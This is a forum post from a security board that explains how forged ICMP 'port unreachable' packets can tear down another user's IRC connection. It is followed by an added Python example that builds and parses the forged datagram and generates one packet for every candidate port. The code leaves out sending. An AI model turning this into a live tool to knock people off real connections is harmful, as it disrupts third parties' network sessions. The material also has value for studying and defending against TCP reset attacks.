UGN Security
Posted By: ninjaneo ICMP 'spoofing' - 07/07/03 05:29 AM
A while ago someone asked me if I still had MindBreadk.exe (a program that was designed to kick a user off of an IRC server). So that got me curious again, and when I went to my usual source of information (SR) he wasn't able to find his past research, so I did some of my own. I will try and explain basically how it works.

First off, here are the protocol specifications (RFCs) for the various things you need to have basic knowledge of.

IP: http://serialcoders.sytes.net/Download/RFC/rfc0791.txt
ICMP: http://serialcoders.sytes.net/Download/RFC/rfc0792.txt
TCP: http://serialcoders.sytes.net/Download/RFC/rfc0793.txt
This, however, was more helpful to me: http://serialcoders.sytes.net/articles/tcp.txt

(Thanks to SR for hosting those)

When you have established a TCP connection to an IRC server, your computer relies on the lower-level layer, IP, to transfer the data from client to server, but if something goes wrong an attempt to report the error is made via an ICMP packet. When your computer gets an ICMP packet it thinks is valid, it responds in various ways; one example is that it cleans up the connection. The only problem with that is, what is to stop anyone from saying they are someone they're not? Nothing. You can very easily send malformed packets saying, for example, that you are an IRC server and that the port is no longer reachable: Type 03, "Port Unreachable". The only things the OSes I tested this 'attack' on (Win98, 2k, XP) seemed to care about were whether it had a valid checksum, whether the local port was correct, and whether it had some data.

The thing that I didn't get for a while was where you put the IP and TCP header information, since there is no assigned space for ports in an ICMP packet. You put it in the DATA section: the original IP header and the first 64 bits of the TCP header.

Which looks something like this...

ver hl          0100 + 0101
tos             00
total length    xxxxxxxxxxxxxxxx
identification  xxxxxxxxxxxxxxxx
flags           0000000000000000
ttl             10000000
protocol        01
chk sum         xxxxxxxxxxxxxxxx
ip source       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
ip dest         xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
---tcp----
source port     xxxxxxxxxxxxxxxx
dest port       xxxxxxxxxxxxxxxx
seq num         xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Each character represents a bit. The X's are things you would want to change for your 'attack'.

Now you're all "WTF IS ALL THAT CRAP", so let me explain.

Each ICMP packet has a fixed set of headers, and an ICMP packet gets a ride on an IP packet. When an error occurs an ICMP packet is sent (whether it fails or succeeds doesn't matter). Well, in the example attack of 'peering' an IRC client, there is a TCP connection between a user and the server. Now, since the Internet just trusts everyone, because there is no central server, we could say we are someone we are not, and by doing this that opens a whole new door of access.

ICMP is a lot easier to spoof because of what the receiving OS checks. If you were to send a fake TCP packet you would need to guess the SEQuence number along with the ACK number, if there is one, and those are each 32 bits, not to mention the source port. 1,208,925,819,614,629,174,706,176 is an estimated amount of how many possible combinations of those variables there are... That is a lot more time consuming than the 65535 estimated ports possible for an ICMP packet.

The reason there is still a source port and dest port in an ICMP packet is because each ICMP packet contains the IP header and first 64 bits of the TCP header of the error-causing packet, of which only the source IP/port and dest IP/port are checked, despite the SEQ number being included in the first 64 bits of the TCP header. When an OS decides an ICMP packet is valid it then proceeds to respond to it, e.g. cleaning up a connection (closing). So an attacker could 'spoof' the sources/destinations and make the receiver close a connection it has established with another computer. I can't think of any good reason to kick a user off of an IRC server, but lots of people do it, so who cares.

The trick is to guess the correct local port... or just try them all.

I hope I gave you an idea of how it works. If you don't understand a part or I didn't explain something very well, please feel free to ask; that's what this board is for.

Note: If you are going to make a program for this, remember that the 'victim' was sending to the server when the error happened (swap some info in the ICMP data).
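The datagram the post describes, as an added example that is not part of the original post: it builds the forged "port unreachable" in memory (outer IP from the server to the client, ICMP type 3 code 3, whose data quotes the IP header and the first 64 bits of TCP of a packet the client sent to the server, so the quoted addresses and ports are swapped relative to the outer datagram), then dissects it the way a receiving stack would, verifying both checksums, requiring the quoted headers to be present, and matching only the quoted addresses and ports, not the sequence number. The addresses, ports and sequence number below are made up, and nothing is transmitted; putting the bytes on the wire would need a raw socket, which is deliberately left out.

```python
import socket
import struct

# Constructed sample values; these addresses and ports are not from the original post.
SERVER_IP = "192.0.2.10"     # IRC server; the forged ICMP error claims to come from here
VICTIM_IP = "198.51.100.7"   # IRC client whose connection is to be torn down
SERVER_PORT = 6667
VICTIM_PORT = 51234          # the 'local port' the post says must be guessed
SEQ = 0x12345678             # quoted, but per the post not checked by the tested stacks

ICMP_DEST_UNREACH = 3        # ICMP type 3, Destination Unreachable
ICMP_PORT_UNREACH = 3        # code 3 under type 3, Port Unreachable
IPPROTO_ICMP = 1
IPPROTO_TCP = 6


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words. Run over a header whose
    checksum field is already filled in, it returns 0 when the checksum is right."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_header(src: str, dst: str, proto: int, payload_len: int, ident: int = 0) -> bytes:
    """20-byte IPv4 header (ver 4, IHL 5, TTL 128, no options) with its checksum set."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      (4 << 4) | 5, 0, 20 + payload_len, ident, 0, 128, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def build_port_unreachable(server_ip, victim_ip, server_port, victim_port, seq) -> bytes:
    """Forge the datagram the post describes: outer IP server -> victim carrying
    ICMP type 3 / code 3, whose data quotes the IP header and first 64 bits
    (8 bytes) of TCP of a packet the VICTIM sent TO the server."""
    # The quoted packet travelled victim -> server, so its src/dst and ports are
    # the reverse of the outer datagram's (the post's closing note).
    quoted_tcp = struct.pack("!HHI", victim_port, server_port, seq)   # sport, dport, seq
    quoted_ip = ip_header(victim_ip, server_ip, IPPROTO_TCP, payload_len=20, ident=0x4242)
    icmp = struct.pack("!BBHI", ICMP_DEST_UNREACH, ICMP_PORT_UNREACH, 0, 0) + quoted_ip + quoted_tcp
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    return ip_header(server_ip, victim_ip, IPPROTO_ICMP, payload_len=len(icmp)) + icmp


def parse_icmp_error(packet: bytes) -> dict:
    """Dissect an ICMP error the way a receiving stack does before looking up the
    connection: check both checksums, require the quoted IP header plus 64 bits
    of transport header, and return the quoted addresses, ports and sequence."""
    ihl = (packet[0] & 0x0F) * 4
    if inet_checksum(packet[:ihl]) != 0:
        raise ValueError("bad IP header checksum")
    icmp = packet[ihl:]
    if len(icmp) < 8 + 20 + 8:
        raise ValueError("ICMP error too short to quote IP header + 64 bits of TCP")
    if inet_checksum(icmp) != 0:
        raise ValueError("bad ICMP checksum")
    quoted = icmp[8:]
    qihl = (quoted[0] & 0x0F) * 4
    sport, dport, seq = struct.unpack("!HHI", quoted[qihl:qihl + 8])
    return {
        "outer_src": socket.inet_ntoa(packet[12:16]),
        "type": icmp[0], "code": icmp[1],
        "proto": quoted[9],
        "inner_src": socket.inet_ntoa(quoted[12:16]),
        "inner_dst": socket.inet_ntoa(quoted[16:20]),
        "sport": sport, "dport": dport, "seq": seq,
    }


def matches_connection(err: dict, local_ip, local_port, remote_ip, remote_port) -> bool:
    """The lookup a stack performs to map an ICMP error onto a TCP connection.
    Only the quoted addresses and ports take part; the sequence number does not,
    which is why guessing the local port is all the forgery needs."""
    return (err["proto"] == IPPROTO_TCP
            and err["inner_src"] == local_ip and err["sport"] == local_port
            and err["inner_dst"] == remote_ip and err["dport"] == remote_port)


def forged_errors_for_all_ports(server_ip, victim_ip, server_port, ports=range(1024, 65536)):
    """'Or just try them all': one forged datagram per candidate local port."""
    for port in ports:
        yield port, build_port_unreachable(server_ip, victim_ip, server_port, port, 0)


if __name__ == "__main__":
    pkt = build_port_unreachable(SERVER_IP, VICTIM_IP, SERVER_PORT, VICTIM_PORT, SEQ)
    print(len(pkt), "bytes:", pkt.hex())
    print(parse_icmp_error(pkt))
```

The forged datagram is 56 bytes: 20 of outer IP, 8 of ICMP header, then the 20-byte quoted IP header and 8 bytes of quoted TCP. Flipping any byte inside the ICMP part makes `parse_icmp_error` reject it on the checksum, and dropping the quoted headers makes it reject it on length, which is the "valid checksum, correct local port, some data" behaviour the post reports; `forged_errors_for_all_ports` is the brute-force over the local port that the post suggests when it cannot be guessed.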
© UGN Security Forum